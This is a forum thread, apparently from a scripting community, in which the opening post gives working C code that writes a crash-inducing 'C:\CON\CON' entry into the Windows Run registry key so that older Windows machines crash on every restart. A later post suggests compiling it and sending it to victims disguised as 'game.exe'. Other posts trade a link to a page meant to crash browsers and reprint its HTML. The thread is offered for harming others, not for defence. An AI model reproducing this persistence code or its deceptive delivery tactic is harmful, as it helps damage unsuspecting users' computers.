Results 1 to 21 of 21

Thread: Force Windows 95/98 to crash

  1. #1
    Join Date
    Jun 2006
    Posts
    5
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default Force Windows 95/98 to crash

    Code:
    #include <windows.h>
    int APIENTRY WinMain(HINSTANCE hInstance,
                         HINSTANCE hPrevInstance,
                         LPSTR     lpCmdLine,
                         int       nCmdShow)
    {
        BYTE Data[11] = "C:\\CON\\CON";
        HKEY KeyHandle;
        RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&KeyHandle);
        RegSetValueEx(KeyHandle,"StartupService",NULL,REG_SZ,Data,11);
        RegCloseKey(KeyHandle);
        return 0;
    }
    Once they restart their computer, they're owned.

    Thanks to Sythe for fixing a small problem with this for me.

  2. #2
    Join Date
    Feb 2006
    Location
    Franklin, Ohio, USA
    Posts
    991
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    Ive got another way: http://www.moparisthebest.com/no.html

    It works on IE6 and firefox pre 1.5, any version of windows

  3. #3
    Join Date
    Feb 2007
    Location
    USA
    Posts
    667
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    How would you get them to run it though? Is there a way to send it or would they have to compile it themselves in Visual Studios or something (which no one would never do)?

  4. #4
    Join Date
    Jun 2007
    Posts
    13
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by omgh4x0rz View Post
    How would you get them to run it though? Is there a way to send it or would they have to compile it themselves in Visual Studios or something (which no one would never do)?
    that's just the source of the program, use a c++ compiler then send them the result executable (let's say... game.exe) lol ;p

  5. #5
    Join Date
    Dec 2006
    Location
    Copy pastin to my C#
    Posts
    3,788
    Mentioned
    8 Post(s)
    Quoted
    29 Post(s)

    Default

    grrr *speaking through teeth: thnks 'lot mpr'*

    How the hell did a html page make me restart?

    when it opened again, it said "Windows has recovered from a fatal error" -.-

    Lol, the "google it noob" should have that as a link.

  6. #6
    Join Date
    Feb 2007
    Location
    SparklesProd.com
    Posts
    2,406
    Mentioned
    1 Post(s)
    Quoted
    0 Post(s)

    Default

    I'm going to try mopars. See if i get restarted. Wish me luck. =P

    Edit: Nope. Just a big black box.

    Edit2:
    Quote Originally Posted by moparisthebest View Post
    firefox pre 1.5, any version of windows
    Oww...

  7. #7
    Join Date
    Dec 2006
    Location
    Banville
    Posts
    3,914
    Mentioned
    12 Post(s)
    Quoted
    98 Post(s)

    Default

    you're a fucking asshole mopar, thanks a lot bitch.

    Make sure you tell people not to click it fucker!
    The jealous temper of mankind, ever more disposed to censure than
    to praise the work of others, has constantly made the pursuit of new
    methods and systems no less perilous than the search after unknown
    lands and seas.

  8. #8
    Join Date
    Dec 2006
    Location
    Copy pastin to my C#
    Posts
    3,788
    Mentioned
    8 Post(s)
    Quoted
    29 Post(s)

    Default

    you're a fucking asshole mopar, thanks a lot bitch.

    Make sure you tell people not to click it fucker!
    Woah, we agreed with something!

    Actually there is one good side for me ther too!

    Rob pwnt ++

    Mopar why did you ever post that? And how the hell can you crash ppls comps from a website, no firewall alarms etc anything..

    Just a silent stab to the back.

  9. #9
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    Default

    Erm.. this topic was bumped majorly.......

    Mopar- Can I have that html source? ^^


    Send SMS messages using Simba
    Please do not send me a PM asking for help; I will not be able to help you! Post in a relevant thread or make your own! And always remember to search first!

  10. #10
    Join Date
    Dec 2006
    Location
    Copy pastin to my C#
    Posts
    3,788
    Mentioned
    8 Post(s)
    Quoted
    29 Post(s)

    Default

    And mopar, since we are now here, if I click the link, my comp restarts, so is there any way to "remote" get the source, like cmd or some java shit or..?

    EDIT: SCAR returned only

    SCAR Code:
    <HTML>
    <HEAD>
    <TITLE>Moparisthebest's WebSite</TITLE>
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
    </HEAD>
    <BODY>
    <p><b><font size="4">Told you not to click it, restarting your computer now =)
    </font></b></p>
    <p>&nbsp;</p>
    <img src="deathpic.png" width="9999999" height="9999999" alt="owned" />
    </BODY>
    </HTML>

  11. #11
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    Default

    Actually, it never crashed my IE6 ^.^ I think a windows update removed that ability


    Send SMS messages using Simba
    Please do not send me a PM asking for help; I will not be able to help you! Post in a relevant thread or make your own! And always remember to search first!

  12. #12
    Join Date
    Feb 2006
    Location
    Pennsylvania
    Posts
    1,524
    Mentioned
    2 Post(s)
    Quoted
    1 Post(s)

    Default

    Quote Originally Posted by n3ss3s View Post
    Woah, we agreed with something!

    Actually there is one good side for me ther too!

    Rob pwnt ++

    Mopar why did you ever post that? And how the hell can you crash ppls comps from a website, no firewall alarms etc anything..

    Just a silent stab to the back.
    Because IE sucks and has an incredible amount of flaws and malicious loopholes that still haven't been fxed.

    Mopar, you posting that brings back memories from like a year or two ago when you first put that page up and we got tons of people to click it, HAHA.

  13. #13
    Join Date
    Dec 2006
    Location
    Copy pastin to my C#
    Posts
    3,788
    Mentioned
    8 Post(s)
    Quoted
    29 Post(s)

    Default

    But bebe im on mozilla?!

    Ub3rl33th4x lol..

    mopar
    But bebe im on mozilla?!
    answer plawkx?

  14. #14
    Join Date
    Aug 2006
    Location
    London
    Posts
    2,021
    Mentioned
    2 Post(s)
    Quoted
    0 Post(s)

    Default

    very nice moparisthebest

    i have managed to get the html source, its very simple and sneaky, i like it a lot

    i think what it actually does it use so much memory that it causes a BSOD, but it dumps the virtual memory so quick that you hardly see it and it just counts as a restart. still though im probably wrong..
    Join the Official SRL IRC channel. Learn how to Here.

  15. #15
    Join Date
    Dec 2006
    Location
    Copy pastin to my C#
    Posts
    3,788
    Mentioned
    8 Post(s)
    Quoted
    29 Post(s)

    Default

    Not necassarily totally wrong.

    Scar told me that it loads a 99999*99999 was it picture, which is too much times the size of my monitor.

  16. #16
    Join Date
    Dec 2006
    Location
    Banville
    Posts
    3,914
    Mentioned
    12 Post(s)
    Quoted
    98 Post(s)

    Default

    I was fucking using Mozzilla 2.* too! SCAR time...
    The jealous temper of mankind, ever more disposed to censure than
    to praise the work of others, has constantly made the pursuit of new
    methods and systems no less perilous than the search after unknown
    lands and seas.

  17. #17
    Join Date
    Aug 2006
    Location
    London
    Posts
    2,021
    Mentioned
    2 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by n3ss3s View Post
    Scar told me that it loads a 99999*99999 was it picture, which is too much times the size of my monitor.
    yeah, this one http://www.moparisthebest.com/deathpic.png

    and i guess if you made the browser resize it to 99999x99999 it would use a lot of memory

    edit: no it wont crash you
    Join the Official SRL IRC channel. Learn how to Here.

  18. #18
    Join Date
    Dec 2006
    Location
    Banville
    Posts
    3,914
    Mentioned
    12 Post(s)
    Quoted
    98 Post(s)

    Default

    Will that crash me? I bet its just a little black 1x1 picture...
    The jealous temper of mankind, ever more disposed to censure than
    to praise the work of others, has constantly made the pursuit of new
    methods and systems no less perilous than the search after unknown
    lands and seas.

  19. #19
    Join Date
    Aug 2006
    Location
    London
    Posts
    2,021
    Mentioned
    2 Post(s)
    Quoted
    0 Post(s)

    Default

    it wont, its 1000x1000, quite simple, it looks like someone drew it in photoshop, you'll be fine
    Join the Official SRL IRC channel. Learn how to Here.

  20. #20
    Join Date
    May 2006
    Location
    Helsinki, Finland (capital)
    Posts
    269
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by R0b0t1 View Post
    you're a fucking asshole mopar, thanks a lot bitch.[..]
    Haha mopar D <3 I'm more like these meatspin on the window guys than crashing the system :P

  21. #21
    Join Date
    Aug 2007
    Location
    England
    Posts
    734
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    a lovely little bump there...
    The truth finally came out...


Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. SRL Crash
    By danman1212 in forum News and General
    Replies: 10
    Last Post: 05-02-2008, 01:13 AM
  2. The force that through the green fuse drives the flower...
    By WhoCares357 in forum Blogs and Writing
    Replies: 11
    Last Post: 03-23-2008, 01:57 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •